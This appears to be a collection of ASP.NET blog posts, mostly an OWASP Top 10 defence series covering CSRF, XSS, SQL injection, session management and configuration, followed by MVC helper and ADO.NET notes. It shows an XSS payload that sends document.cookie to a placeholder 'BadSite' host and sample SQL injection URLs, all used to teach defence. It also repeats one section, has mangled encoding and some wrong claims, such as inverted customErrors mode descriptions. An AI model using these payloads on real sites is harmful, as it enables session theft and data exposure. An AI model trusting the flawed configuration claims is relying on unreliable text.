Turn off GZIP

Chrome was trying to decompress .NET issued JS valdiation files, which were already cached causing issues, when refreshing the browser.

This was causing the Page_Validators ( .NET JS Validators ) being unset and all client side javascript validation was not running.

You can prevent chrome/firefox dev tools from caching content but I got IIS to stop compressing the content within th web.config. Obviously don’t leave this on in production and only add this into the web.config.debug.

 <system.webServer>

 <urlCompression doStaticCompression="false" doDynamicCompression="false"/>

</system.webServer>

OWASP Top 10 #6 – Security Misconfiguration

What Is It?

Security misconfiguration is anything which is considered insecure due to the settings or configuration upon a server.

This can be anything from debug settings being turned on or even out of date third party frameworks being used.

Custom Errors

Leaking of information about the implemented technology stack could be an invitation for hackers to probe a system further. With regards to an SQL injection attack, error messages can be used to view details about the database schema such as table names and then further be used to display the contents of a database table.

Error messages displayed to a user should contain information useful to the user only and nothing else. They should report to the user the minimal amount information for them to react to the error.

Any information such as details of the error or the trace stack should be hidden from the user.

We can disable the standard .NET ‘yellow’ error message which contains the trace stack and the details of the error on a site basis. This is done within the customErrors node of the web.config

&lt;customErrors mode=&quot;On&quot; defaultRedirect=&quot;Error.aspx&quot; /&gt;

The mode attribute can contain the following values:

  • On
    • Errors are reported in full. This is the default value.
  • Off
    • Errors are not reported. The user is redirected to the page defined within the defaultRedirect attribute
  • RemoteOnly
    • Users viewing the site on their local host are reported the errors in full
    • Users not viewing the site on their local host are redirected to the page defined within the defaultRedirect attribute.

If no defaultRedirect is provided the user is presented with a http response code of 500. This in itself is bad as it highlights our site as a potential site worthy of more probing by a hacker. The status code is easily read by batch scripts probing sites.

Providing a defaultRedirect presents the user with the page defined by the attribute along with a http status code of 302 (temporary redirect). This unfortunately creates a query string parameter of aspxerrorpath set to the relative URL of the page which caused the error. This can also be easily used by batch scripts to determine if a page is an error page.

We can redirect to the error page without the indicating that there was an error by changing the RedirectMode from ResponseRedirect (default) to ResponseRewrite.

&lt;customErrors mode=&quot;On&quot; defaultRedirect=&quot;Error.aspx&quot; RedirectMode=&quot;ResponseRewrite&quot; /&gt;

With this set, the contents of the error page is simply set to the response of the request without a redirect. The http status code is set to 200 which is the OK code. The hacker would need to read the contents of the page to try and determine if the page is an error page. This in itself is harder and slower. Anything we can do to slow down the hacker reduces the amount of hacking they can do on our site.

Disabling Trace

Trace information allows collecting, viewing and analysis of debug information that is collected and cached by ASP.NET. The information can be viewed at the bottom of individual pages or within the trace viewer which is accessed by calling the Trace.axd page from the route directory of the web site.

Like any debug information it contains details of implemented technology and potentially sensitive information that might be logged by accident. There are many instances of security issues where personal information such as credit card details or user accounts used in database connection strings which are logged as part of the debugging.

Tracing should be disabled within the web.config for all production environments.

&lt;trace enabled=&quot;false&quot; /&gt;

Keep Frameworks/Third Party Code Up To Date

All third party frameworks should be kept up to date to ensure that you are protected from any security issues which have been fixed within them.

With the use of NuGet this can be achieved very easily.

Encrypting Sensitive Parts Of The Web.Config

Sensitive data such as user accounts, passwords and private keys that are contained within the web.config should be encrypted.

If they are accidentally exposed to the user during an error while accessing a page or logged into an audit table and viewed by someone who should not see them, their details will not be readable.

It is also a good idea to reduce the amount of people who have access to sensitive information.

You can encrypt a node of a web.config at the visual studio command prompt by the following:

aspnet_regiis -site &quot;Site Name In IIS&quot; -app &quot;/&quot; -pe &quot;connectionStrings&quot;

This will update the web.config replacing the sensitive information with an encrypted version.

The file can be decrypted with the following command:

aspnet_regiis -site &quot;Site Name In IIS&quot; -app &quot;/&quot; -pd &quot;connectionStrings&quot;

This process uses a key which is created based upon the servers MAC address and as such is unique to the server and therefore can only be decrypted upon the web server.

Using Config Transforms To Ensure Secure Configurations

It can be very easy to leave debug settings such as non custom errors and tracing within a web.config.

Transforms for debug and release can be used to ensure that only settings for the required release are used when that release target is used.

Use Web.Release.Config to transform the Web.Config for release:

  • Remove debug attributes
  • Add custom errors
  • Remove trace

These transforms are only run during a site publish.

Retail Mode

Retail mode can be used as a back stop to ensure that no web.config setting which is considered unsafe in a production environment is actually enabled. For example in retail mode, turning off custom errors or turning on tracing will have no effect.

This setting can be set in the web.config though it is recommended to set it within the machine.config of the web server.

&lt;deployment retail=&quot;true&quot; /&gt;

OWASP Top 10 #5 – Cross Site Request Forgery (CSRF)

What Is It?

Before we talk about CSRF it is important to understand that all cookies created by a domain are sent back to that domain during page requests regardless which domain the page originated from. This includes cookies which contain authentication session cookies.

Hackers can simply change the action attribute of a form to be that of the domain/URL they are trying to breach. An unsuspecting site would only ensure that the authentication session token is valid. It would therefore be possible to use the users open session to perform malicious actions such as saving or reading data from a database.

How Can I Protect My Self From It?

Protection from CSRF attacks has a simple solution. Send another cryptically secure token to the user along with the authentication session token. This token is sent both on the page being generated as well as a cookie.

Upon receiving a post back from a page, the server simply reads the CSRF token from the page and the cookie and ensures that they are identical.

As only a page generated from the site would contain the token, any fake page posting back to the server will be missing the correct CSRF token.

MVC

The MVC helper method AntiForgeyToken generates a CSRF token and persists it in a cookie and a hidden input element on the page.

using (Html.BeginForm())
{
  @Html.AntiForgeyToken()
}

Validation against a CSRF attack is made by decorating the controller’s action method with the ValidateAntiForgeryToken attribute.

[HttpPost]
[Authorise]
[ValidateAntiForgeryToken]
public ActionResult Index(McModel bigMac)
{
}

If a CSRF attack is caught a System.Mvc.HttpAntiForgeryException is thrown and the user is presented with a 500 status code.

ASP.NET Web Forms

A page written in ASP.NET web forms would traditionally need to manually perform the CSRF token, its persistence and checks to ensure they are identical when the page is posted back.

However we can now make use of the AntiForgery class.

https://msdn.microsoft.com/en-us/library/system.web.helpers.antiforgery%28v=vs.111%29.aspx

Within the aspx page a call to the GrtHtml method would generate the CSRF token which is then persisted within a cookie and an input element upon the page.

&lt;%= System.Web.Helpers.AntiForgery.GetHtml() %&gt;

Validation against a CSRF attack would then be performed during a page post back with the Validation method.

protected void Page_Load(object sender, EventArgs e)
{
    if (IsPostBack) {
        AntiForgery.Validate();
    }
}

Securing Cookies

Http Only Cookies

Using AntiForgery.GetHtml or @Html.AntiForgeyToken should create cookies which are secured for access by the server only and not via a client side script.

However where a more manual approach has been made to CSRF protection it is important to ensure that the CSRF token cannot be read from by a client side script. If this is not the case then a malicious page could read the token and simply add it to its form data before posting back to the server; circumventing our protection.

Cookies can be set as HttpOnly via a property during their creation:

var cookie = new HttpCookie(&quot;MyCookies&quot;, DateTime.Now.ToString());
cookie.HttpOnly = true;

Cookies can be set as HttpOnly globally for a website via the web.config:

&lt;httpCookies domain=&quot;String&quot; httpOnlyCookies=&quot;true&quot; /&gt;

Note is it probably wise to set httpOnlyCookies to true regardless of your CSRF approach. Any information stored within a cookie which could be readable on the client side is probably a bad idea.

SSL Only Cookies

Where cookies contain sensitive information such as CSRF or authentication session token, it would be wise to enforce their transportation via SSL or HTTPS, as such preventing people from spying on the network traffic and therefore stealing them.

This can be done globally for a site within the web.config:

&lt;httpCookies domain=&quot;String&quot; httpOnlyCookies=&quot;true&quot; requireSSL=&quot;true&quot; /&gt;

However this approach might not always be possible. We can conditionally determine when to enforce SSL communication for cookies by checking the forms authentication settings and the connection for their status of secure connections. The individual cookie can then then be secured for SSL communication only via the Secure property.

var cookie = new HttpCookie(&quot;MyCookies&quot;, DateTime.Now.ToString());
cookie.HttpOnly = true;

if( FormsAuthentication.RequireSSL &amp;&amp; Request.IsSecureConnection) {
    cookies.Secure = true;
}

OWASP Top 10 #4 – Insecure Direct Object References

Direct Object Reference

A direct object reference is a key or id which is used identify a piece or set of data. The data would typically be a record within a a table of a database.

They can be:

  • Patterns such as incrementing integers/ids
  • Natural keys such as a username or email address.
  • Discoverable data such as a national insurance number or a social security number.

What Is it?

An insecure direct object reference is when a user accesses a direct object reference when they are not permitted to.

This can be from an unsecured page and an unauthenticated user. It can also come from a secured page and authenticated user, where there is simply insufficient checks that they can view the data they have requested.

Quite often the user guesses or enumerates a direct object reference either manually or by an automated script.

If the data should only be visible to a subset of people then any requests to that data should be validated that they are permitted to see that data. Simply relying on not displaying links to the user is not secure enough.

How Can I Protect Against It?

Validate Access

The first point to address is to validate that the user has permission to access the data.

For example; is the person permitted to see the financial records of the bank account in question?

Quite often the validation checks are placed around populating the UI to navigate to the data but no checks are placed around querying the data.

Indirect Reference Maps

A normal approach to view database records on a web page is to expose the table fields and their direct object references on the URL

https://www.MySite/Foo.aspx?id=1

Here an attacker can simply increment the id to try and view other peoples Foo which are simple incrementing ids or identity indexes generated automatically by the database.

An indirect reference provides an abstraction between what is publicly observable in the URL and what is used to uniquely identify a record within a database.

A dictionary is used to store a map between the id and a randomly generated cryptically secure identifier. We then pass these secure identifier to the user as part of URLs which they can request.

https://www.MySite/Foo.aspx?id=ASWERDFMJSDGJSERSASKAWEOSDSDF

These keys should also be mapped to the user’s session to protect against the ids being leaked:

The following code shows how to generate a cryptically safe unique id using the RNGCryptoServiceProvider class.

using System.Security.Cryptography;

using( var rng = new RNGCryptoServiceProvider() )
{
    map[id] = HttpServerUtility.UrlTokenEncode(rng.GetBytes(new byte[32]));
}

// Store the map within the users session
HttpContext.Current.Session[&quot;Map&quot;] = map;

In the example above it would be best to only create one instance of the RNGCryptoServiceProvider class regardless of how many direct object references are being made. Consider creating a class which implements IDisposable which calls Dispose upon the instance of RNGCryptoServiceProvider within it’s Dispose method.

Obfuscation via non-discoverable surrogate keys

A surrogate key is a set of fields which when used together can uniquely identify a record. These are harder to guess than a single column which has a distinctive pattern such as an identify index which increments by one each time.

Surrogate keys would require more space to index and are also slower, it is a trade off between performance and security.

A random unique identifier such as a GUID is harder to guess but does not perform as well as an integer when used to search upon. Also for tables such as logs and audits which are used to generate a high number records, the indexes will become fragmented and as such will have more overhead for de-fragmenting them regularly.

OWASP Top 10 #5 – Cross Site Request Forgery (CSRF)

What Is It?

Before we talk about CSRF it is important to understand that all cookies created by a domain are sent back to that domain during page requests regardless which domain the page originated from. This includes cookies which contain authentication session cookies.

Hackers can simply change the action attribute of a form to be that of the domain/URL they are trying to breach. An unsuspecting site would only ensure that the authentication session token is valid. It would therefore be possible to use the users open session to perform malicious actions such as saving or reading data from a database.

How Can I Protect My Self From It?

Protection from CSRF attacks has a simple solution. Send another cryptically secure token to the user along with the authentication session token. This token is sent both on the page being generated as well as a cookie.

Upon receiving a post back from a page, the server simply reads the CSRF token from the page and the cookie and ensures that they are identical.

As only a page generated from the site would contain the token, any fake page posting back to the server will be missing the correct CSRF token.

MVC

The MVC helper method AntiForgeyToken generates a CSRF token and persists it in a cookie and a hidden input element on the page.

using (Html.BeginForm())
{
  @Html.AntiForgeyToken()
}

Validation against a CSRF attack is made by decorating the controller’s action method with the ValidateAntiForgeryToken attribute.

[HttpPost]
[Authorise]
[ValidateAntiForgeryToken]
public ActionResult Index(McModel bigMac)
{
}

If a CSRF attack is caught a System.Mvc.HttpAntiForgeryException is thrown and the user is presented with a 500 status code.

ASP.NET Web Forms

A page written in ASP.NET web forms would traditionally need to manually perform the CSRF token, its persistence and checks to ensure they are identical when the page is posted back.

However we can now make use of the AntiForgery class.

https://msdn.microsoft.com/en-us/library/system.web.helpers.antiforgery%28v=vs.111%29.aspx

Within the aspx page a call to the GrtHtml method would generate the CSRF token which is then persisted within a cookie and an input element upon the page.

<%=System.Web.Helpers.AntiForgery.GetHtml() %>

Validation against a CSRF attack would then be performed during a page post back with the Validation method.

protected void Page_Load(object sender, EventArgs e)
{
    if (IsPostBack) {
        AntiForgery.Validate();
    }
}

Securing Cookies

Http Only Cookies

Using AntiForgery.GetHtml or @Html.AntiForgeyToken should create cookies which are secured for access by the server only and not via a client side script.

However where a more manual approach has been made to CSRF protection it is important to ensure that the CSRF token cannot be read from by a client side script. If this is not the case then a malicious page could read the token and simply add it to its form data before posting back to the server; circumventing our protection.

Cookies can be set as HttpOnly via a property during their creation:

var cookie = new HttpCookie("MyCookies", DateTime.Now.ToString());
cookie.HttpOnly = true;

Cookies can be set as HttpOnly globally for a website via the web.config:

httpCookies domain="String" httpOnlyCookies="true"

Note is it probably wise to set httpOnlyCookies to true regardless of your CSRF approach. Any information stored within a cookie which could be readable on the client side is probably a bad idea.

SSL Only Cookies

Where cookies contain sensitive information such as CSRF or authentication session token, it would be wise to enforce their transportation via SSL or HTTPS, as such preventing people from spying on the network traffic and therefore stealing them.

This can be done globally for a site within the web.config:

httpCookies domain="String" httpOnlyCookies="true" requireSSL="true"

However this approach might not always be possible. We can conditionally determine when to enforce SSL communication for cookies by checking the forms authentication settings and the connection for their status of secure connections. The individual cookie can then then be secured for SSL communication only via the Secure property.

var cookie = new HttpCookie("MyCookies", DateTime.Now.ToString());
cookie.HttpOnly = true;

if( FormsAuthentication.RequireSSL && Request.IsSecureConnection) {
    cookies.Secure = true;
}

OWASP Top 10 #3 – Broken Authentication & Session Management

How to secure .NET websites from broken authentication and session management security attacks.

Sessions In A Stateless Protocol

To understand broken authentication attacks such as session hijacking it is important to understand how a user is logged in and kept logged in within the stateless protocol HTTP.

HTTP is a stateless protocol, each request is independent of every other request. Any knowledge of previous requests and their contents is maintained outside of the bounds of the protocol.

ASP.NET maintains session data either on the client side in browser cookies or on the server side in memory or within a database and ties the data to the user via session which is identified by unique identifier.

Web sites which require a user to log in make use of a unique identifier or session token which is created during then authentication process, associated or linked to the users account and then passed between the users web browser and the web server via a cookie.

What Is It?

If the authentication session token is discovered by a potential attacker, it can be used to steal the users session. This can be by either a session fixation or a session hijack.

Session hijacking is when an attacker gets hold of a session identifier and uses this to gain access to a users session and hence impersonates them.

Session fixation is when a user who is logged in to a site overrides their session identifier set in a cookie by passing in another session identifier within the query string; thus pretending to be someone else with potentially elevated user access.

Session ids can be passed between client and server by a query string parameter within a URL as well as cookies and form data.

How Can I Protect Myself From It?

Do Not Persist Session Tokens In The URL

Seeing as URLs are logged, shared and retrievable from a browser’s history; the first line of defence is not to persist session tokens in URLs, you should favour cookies.

Note that a default form post action is GET; I have fixed many security issues which were caused simply by forgetting to set the action to POST.

Persist Session Tokens In Cookies

To get .NET to persist the session token within cookies you can set the cookieless attribute of the sessionState node to UseCookies within the web.config.

&lt;system.web&gt;
  &lt;sessionState cookieless=&quot;UseCookies&quot; /&gt;

Other options of the variable are:

  • UseUri
  • Always use the URL regardless of device support
  • UreCookies (default)
  • Always use cookies regardless of device support
  • UseDeviceProfile
  • ASP.NET determines if cookies are supported in the browser and falls back to URL if not.
  • AutoDetect
  • ASP.NET determines if cookies are enabled in the browser and falls back to the URL if not.

Note there is a difference between enabled and supported.

Note you should perhaps question whether users who are using browsers with no cookie support or with cookies disabled should be allowed to use your site.

Secure Cookies

All cookies should be set to HttpOnly; this prevents the browser from reading the contents and as such reduces the chance of their contents being read by malicious code.

Cookies which contain session data should be configured to be served over SSL connections only.

Use ASP.NET Membership Provider For Authentication

Whenever security is concerned, it is important to use tried and tested frameworks in favour of writing your own.

The .NET membership provider is built into ASP and should be favoured.

It contains the following functionality:

  • Automatic schema creation upon first usage
  • Default website projects which are set up to allow
  • Creating user accounts
  • User login/log out
  • Session persistence between page requests
  • Automatic page/URL protection from non logged in users or users not within a user group
  • User groups for a more granular permissions

Automatically Logout Expired Sessions

A session token should only be considered valid for the minimum viable amount of time possible. If a session token is leaked the smaller the time window it is exploitable reduces the chance of the session being hijacked.

You can set the forms login session length in minutes within the web.config:

&amp;lt forms loginUrl=&quot;~/Account/Login&quot; timeout=&quot;30&quot; /&amp;gt

By default the timeout is sliding, it expires after the configured amount of time has passed after the last request has been made.

It is possible to change the timeout to be fixed, expiring after the configured amount of time has passed after the user has logged in.

&amp;lt forms slidingExpiration=&quot;false&quot; /&amp;gt

Other Checks

OWASP Top 10 # 2 – Cross Site Scripting (XSS)

Cross Site Scripting (XSS)

What is it?

Cross-site Scripting (XSS) is a variation of a code injection attack where an attacker injects client-side script onto a vulnerable website which is later unintentionally executed by a user.

The client side script could be VBScript, ActiveX, Flash or JavaScript.

The attack makes use of unvalidated or unencoded user input which is outputted by the website and then executed by the user’s web browser.

How does it happen?

In its simplest form a script is taken from a query string parameter;

www.foo.com/foo.aspx?q=foo location.href = 'http://BadSite/DoSomethingBad.html?cookie='%2Bdocument.cookie

Here our query string parameter contains a malicious payload:

 location.href = 'http://foo/dosomethingbad.html?cookie='%2Bdocument.cookie

Rendering the requested parameter value as is within outputted html within a client browser, i.e. without any encoding, will cause the script to be executed.

Here we show how an injected script could pass the value of a cookie to our hacker’s site:

&lt;span&gt;
    You searched for  location.href = 'http://foo/dosomethingbad.html?cookie='%2Bdocument.cookie
&lt;/span&gt;

This cookie value could contain an authorisation token or other sensitive data which could be used to exploit the user further.

Sources of an attack

The client side script or malicious payload can come from many sources:

  • In the URL via a query string or route parameter
  • Http form posted
  • In cookies
  • Http request headers
  • Web services calls
  • Persisted in databases
  • Files such as XML, XSD, CSV

In fact anything which does not come directly from our source code should be treated as potentially malicious. That includes data and services from within the bounds of our company as well as data entered directly from our users, even if they are our colleagues operating on back office software.

How can I protect myself from this?

Protection of an attack should be multi-layered to maximise the protection. Any breached layer is simply one of many layers providing protection.

Output encoding

The primary method of mitigating from XSS attacks is to contextually escape untrusted and potentially unsafe data. This involves replacing certain string characters with their equivalent escaped and safe characters.

For example with a html encoding scheme the character is replaced with >

The string

&lt;b&gt;Hello&lt;/b&gt;

would be replaced with

&amp;ltbi&gt;Hello&lt;/b&gt;

The string would then be displayed as

&lt;b&gt;Hello&lt;/b&gt;

without the bold mark up being executed and the word hello being rendered in bold. The potentially malicious payload is made harmless.

There are several encoding schemes and the right one should be chosen depending upon where the untrusted user input is to be rendered into. These include HTML, JavaScript, CSS, URL and XML.

It is important that you use a well-proven library to implement output encoding and do not try to write your own.

Encoding HTML

As of .NEt 4.5 the anti XSS tool is built into the .net framework.

using System.Web.Security.AntiXss;

var encodedString = AntiXssEncoder.HtmlEncode(inputString, true);

The second parameter determines whether to use named entities. For example this changes the copyright symbol to ©.

In previous versions of .NET you need to download the anti XSS library which can be found within NuGet.

Html Encode

The .NET framework also includes HttpUtility.HtmlEncode and Server.HtmlEncode.

Please do not use these as they simply encode the characters , “, and &. This approach is not sufficient to prevent against XSS attacks. For example JavaScript such as “alert(‘smerfs’);” injected into an attribute of an input element would be executed.

JavaScript

Even in .NET 4.5, the anti xss capabilities does not extend to escaping JavaScript, you need to download the AntiXSS external library.

var q = &lt;%=Microsoft.Security.Application.encoder.JavaScriptEncode(Request.QueryString[&quot;foo&quot;])%&gt;

Self Escaping Web forms controls in System.Web.UI

When working with ASP.NET WebForms, some controls and their properties encode html, the following page highlights which do and which do not:

https://blogs.msdn.microsoft.com/sfaust/2008/09/02/which-asp-net-controls-automatically-encodes/

Output encoding in MVC

The razor view engine automatically html encodes output by default.

// the following automatically escapes
@Html.Label(&quot;&lt;b&gt;Hello&lt;/b&gt;&quot;)

When in the very rare circumstances you do not want encoding to occur you can explicitly override this functionality.

// Request non escaping with the raw command.
@Html.Raw(&quot;&lt;b&gt;Hello&lt;/b&gt;&quot;)

White listing allowable values

When collecting information from a user you should validate their input against a list of known safe values. This allows us to catch any invalid bad data very early on in the process.

Validation can be type conversion, regular expressions or even checking their inclusion from a list of known values such as colours or countries.

The following examines an input string is valid:

if(!RegEx,.IsMatch(searchTerm, @&quot;^[\p{L} \.\-]+$&quot;)
{
   throw new ApplicationException(&quot;The search term is not allowed&quot;);
}
  • \p{L} matches any kind of letter from any language
  • \, matches the period character
  • -, matches the hyphen character
    • indicates any number of these characters
  • ^ $ indicates that the input string starts and ends with these characters i.e. contains only these characters.

Request Validation

.NET provides request validation, an inbuilt protection of XSS that looks at all incoming data from within forms, query string parameters, route sections, header values etc. It will catch XSS attacks before it reaches your page.

This is enabled or disabled within the web.config:

 &lt;pages validationRequest=&quot;true&quot;&gt;
 &lt;/pages&gt;

This functionality is available since .NET 2, though by default it appears to be disabled in versions less than 3.5.

ASP.NET will automatically throw a HTTPRequestValidationException when it detects an XSS attack.

The method System.Web.HttpRequest.ValidateString is used to perform the check and raise the exception.

Disabling Request Validation

Disabling Request Validation At The Page Level

We can disable request validation on a page level:

&lt;%@ Page Title = &quot;&quot; ValidateRequest=&quot;false&quot; Language &quot;C#&quot; /&gt;

Disabling Request Validation At The Control Level

We can disable validation for a specific control.

&lt;asp:button Id=&quot;myButton&quot; runat=&quot;server&quot; ValidateRequestMode=&quot;Disabled&quot; /&gt;

This is a ASP.NET 4.5 feature and will need a change to the request validation model from 2.0 to 4.5:

&lt;system.web&gt;
&lt;httpRuntime targetFramework=&quot;4.5&quot; requestValidationMode=&quot;4.5&quot; /&gt;

Disabling Request Validation When Requesting Data

We can disable the validation when getting data sent within the Http request. This is done by calling the Unvalidated method before any call to the Http request data.

var foo = Request.Unvalidated.QueryString[&quot;foo&quot;];

Disable MVC

We can disable the validation request on model binding in MVC,

public class MyController {
    [HttpPost]
    public void DoFoo(MyModel model)
    {
    }
}

public class MyModel {
    [AllowHtml]
    public string Myfield { get; set;}
}

The AllowHtml attribute placed on any model or model’s field will allow that field to be bound to incoming data regardless of it’s contents.

The default action is to not allow unsafe data, whereby an exception will be thrown if it is deemed unsafe.

Other Encoding

The Anti-XSS library contains other methods for encoding data against XSS for URL, XML and other schemes.

More information can be found here:

https://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder_methods%28v=vs.110%29.aspx

OWASP Top 10 # 1 – Injection Attacks

Injection

What is it?

An injection attack is where a program, database or interpreter is tricked into executing code or performing functionality which was not intended to be run.

Though SQL injection is probably the most commonly known type of injection attack, it is a vulnerability that can affect many technologies;

  • SQL
  • XPath
  • LDAP
  • Applications / Operating Systems

SQL injection is when a query or command parameter which should contain a simple variable value actually contains additional syntax which is inadvertently executed by the database.

How does it happen?

For many web applications a URL such as http://www.TheFooSite.com/MyDatabaseTable?Id=1 would translated into a query such as:

Select * From MyDatabaseTable Where Id = 1

The integrity of the value of the id has come from the user and as such can contain potentially any malicious payload.

For example, we can change the sql query to return all data within the table:

http://www.TheFooSite.com/MyDatabaseTable?Id=1 or 1=1

Alternatively we could make the database throw an error which could potentially propagate to the user and show our technology stack, this in turn would invite any potential hacker to start a more in depth probe:

http://www.TheFooSite.com/MyDatabaseTable?Id=x

Additionally we could append on queries which query the schema tables such sysobjects and could start to expose our database structure to the user. This could then be used to append queries which exposes the potentially sensitive data contained within these tables such as credit card numbers and identity numbers:

http://www.TheFooSite.com/MyDatabaseTable?Id=SELECT name FROM master..sysobjects WHERE xtype = 'U';

Untrusted data sources

Any information which comes from the user, third party or external entity should be considered as untrusted and therefore potentially dangerous.

The sources of untrusted data are numerous:

  • From the user
    • In the URL via a query string or route parameter
    • Posted via a form
  • From the browser
    • In cookies
    • In the request headers
  • Web services calls
  • Database
  • Files such as XML, XSD, CSV

In fact anything which does not come directly from our running source code should be treated as potentially malicious. That includes data and services from within the bounds of our company as well as data entered directly from our users, even if they are our colleagues.

How can I protect myself from this?

Security is all about addressing the security concern at multiple levels; this way if one level is breached there are more levels which can catch the breach.

The principle of least privilege

The principle of least privilege is about giving any entity that requires permissions to perform a job, the minimum level of permissions it requires to perform that job.

Why grant access for the user account which is used by a web application to query an entire database, delete data, modify schema or even grant administrator level access? By granting the minimum level of permissions you dramatically reduced the level of damage that a breach can perform.

Don’t give the account db_owner access; this can read, update, delete, truncate and drop any table as well as execute any stored procedures and modify the schema.

A user account should be given access to:

  • Read from only the individual table(s) required
  • Write to only the individual table(s) required
  • Execute only the required stored procedures required

Any account accessed by a web application should probably never be given access to modify any schema, read or write to any schema or system tables and should probably not even be given access to physically delete data from any tables.

If you need to delete data, consider marking records as deleted by a status field and archiving off the records by a system task running in the background.

Where different levels of access is required between types of user account groups or roles, consider having multiple accounts. For example a public account used by public user groups and an admin account which is used by back office staff.

Please note: just because the user role is ‘admin’ it does not mean they should be given anything but the bare minimum permissions within the database.

In line SQL parametrisation

Most issues from SQL injection are from parameters being attached to the query or command via string concatenation. Take the following example which concatenates a parameter taken from the user via a URL query string parameter.

var id = Request.QueryString[&amp;amp;quot;Id&amp;amp;quot;];
var sqlCommand = &amp;amp;quot;SELECT * FROM MyTable WHERE id = &amp;amp;quot; + id;

The data within the parameter is run as is within the database allowing the data within the parameter to break out of its parameter scope and into a query scope.

For example “1 or 1=1” will be searched upon as if it has two parts of the predicate.

By parametrising the query, the data contained within the parameter will stay within the scope of the parameter; here we will try and search for an id which is equal to “1 or 1=1” which at some level will either retrieve no data or throw an error when trying to convert between data types.

The following shows how we can parametrise an line query:

var id = Request.QueryString[&amp;amp;quot;id&amp;amp;quot;];

var sqlCommand = &amp;amp;quot;SELECT * FROM Foo WHERE Id = @id&amp;amp;quot;;

using (var connection = new SqlConnection(connString))
{
using (var command = new SqlCommand(sqlString, connection))
{
command.Parameters.Add(&amp;amp;quot;@d&amp;amp;quot;, SqlDbType.VarChar).Value = id;
command.Connection.Open();
var data = command.ExecuteReader();
}
}

We now have an error thrown within by the database as it cannot convert the string “1 or 1=1” into an integer; the data type of the id field.

Stored procedure Parametrisation

The problem with in line parametrised queries is that you have to remember to do them. By using stored procedures you are enforced to perform this step.

var id = Request.QueryString[&amp;amp;quot;id&amp;amp;quot;];

var sqlString = &amp;amp;quot;GetFoo&amp;amp;quot;;
using (var conn = new SqlConnection(connString))
{
using (var command = new SqlCommand(sqlString, conn))
{
command.CommandType = CommandType.StoredProcedure;
command.Parameters.Add(&amp;amp;quot;@id&amp;amp;quot;, SqlDbType.VarChar).Value = id;
command.Connection.Open();
var data = command.ExecuteReader();
}
}

This will cause a similar issue that our bad string cannot be converted to an integer.

White listing untrusted data

Where possible, all untrusted data should always be validated against a white list of known safe values.

A white list states a set of rules which defines the data. Any incoming data must be validated against these rules to be considered safe. Failure of the validation should interpret the data as an expected attack.

There are multiple ways of performing white list:

  • Type conversion
    • Integer, date, GUID
  • Regular expression
    • Email address, phone number, name
  • Enumerated list of known good values
    • Titles, countries and colours for example

The following shows how we can use the try parse function to white list our id parameter by trying to convert it to an integer.

int idString;
if(!int.TryParse(idString, out id))
{
throw new Exception(&amp;amp;quot;The id is not a valid integer.&amp;amp;quot;);
}

Note: any errors should be handled, where required audited and then the user should be displayed a human readable message which gives nothing away about our implemented technology stack or in-depth details of the error.

Now that we have the parameter as integer we can add our parameter into the command as an integer:

command.Parameters.Add(&amp;amp;quot;@id&amp;amp;quot;, SqlDbType.Int).Value = id;

Any suspect attacks now should be caught way before the database which is a good place to be.

ORM’s

ORM’s should automatically parametrise any SQL.

The only thing to note is that when using ORM’s it is often required to drop to native SQL for performance reasons. When doing this care should be made to ensure all untrusted data is parametrised using the steps above.

Injection through stored procedures

Care should be taken when using stored procedures that they are not themselves concatenating parameters before calling exec.

declare @query varchar(max)
set @query = 'select * from dbo.MyTable where MyField like ''%'+ @parameter + '%''
EXEC(@query)

The stored procedure sp_executesql allows parametrising sql statements which are held as string.

declare @query varchar(max)
set @query = 'select * from dbo.Foo where MyField like ''%'+ @myFieldParameter + '%''

EXEC sp_executesql @query, N'@search varchar(50)', @myFieldParameter=@parameter

Automated SQL injection tools

There are a number of tools which can automate the hacking process, allowing people with next to no technical experience to perform automated attacks or to test the strength of web applications.

Best SQL Injection Tools

Self Closing MVC Html Helpers

The following is an example of how to write a self closing MVC Html helper similar to BeginForm(). It takes the form of a self closing DIV tag; in fact we will write a Bootstrap panel.

We will be profiting from the IDisposable and the Dispose method which will write our closing div tag

First we create a class which will be passed an Action which will write our end tag; this class implements IDisposable and calls out required action.

using System;

namespace WebApps.HtmlHelpers
{
  internal class DisposableHtmlHelper : IDisposable
  {
    private readonly Action _end;

    public DisposableHtmlHelper(Action end)
    {
      _end = end;
    }

    public void Dispose()
    {
      _end();
    }
  }
}

Now we write our help methods; a BeingPanel method which writes a div tag to the ViewContect response stream. It returns an instance of our newly created DisposableHtmlHelper as defined above. We register with it our method which will write out closing tag.

using System;
using System.Web.Mvc;

namespace WebApps.HtmlHelpers
{
  public static class HtmlHelpers
  {
    public static IDisposable BeginPanel(this HtmlHelper htmlHelper)
    {
      htmlHelper.ViewContext.Writer.Write(@"<div class="">");

      return new DisposableHtmlHelper(htmlHelper.EndPanel);
    }

    public static void EndDiv(this HtmlHelper htmlHelper)
    {
      htmlHelper.ViewContext.Writer.Write("</div>");
    }

    public static void EndPanel(this HtmlHelper htmlHelper)
    {
      htmlHelper.EndDiv();
    }
  }
}

We can now call this within a using statement in our view.

@using (Html.BeginPanel()) {
 // Monkey business would be here
}

ADO.NET – Connected Layer

Intro

The connected layer provides functionality for running SQL syntax against a connected database. The statements can be select, insert, update or delete as well as execute schema statements and the ability to run stored procedures and functions.

The connected layer requires the database connection to remain open while the database transactions are being performed.

Source Code

All source code can be found on GitHub here.

This is part of my HowTo in .NET seriies. An overview can be seen here,

Command Objects

The Command object represents a SQL statement to be run; select, insert, update, delete, execute schema, execute stored procedure etc.

The DbCommand is configured to execute an sql statement or stored procedure via the CommandText property.

The CommandType defines the type of sql statement to be executed which is stored in the CommandText property.

CommandType

Description

StoredProcedure

CommandText contains the name of a StoredProcedure or UserFunction.

TableDirect

CommandText contains a table name. All rows and columns will be returned from the table.

Text

CommandText defines an SQL statement to be executed.

The CommandType will default to Text however it is good practice to explicitly set it.

var connectionDetails =
ConfigurationManager.ConnectionStrings ["MyDatabase"];

var providerName = connectionDetails.ProviderName;
var connectionString = connectionDetails.ConnectionString;

var dbFactory = DbProviderFactories.GetFactory (providerName);

using(var cn = dbFactory.CreateConnection())
{
cn.ConnectionString = connectionString;
cn.Open();

var cmd = cn.CreateCommand();

cmd.CommandText = "Select * from MyTable";
cmd.CommandType = CommandType.Text;
cmd.Connection = cn;
}

The command should be passed the connection via the Connection property.

The command object will not touch the database until the either the ExecuteReader, ExecuteNonQuery or equivalent has been called upon.

DataReader

The DataReader class allows a readonly iterative view of the data returned from a configured command object.

A DataReader is instantiated by calling ExecuteReader upon the command object.

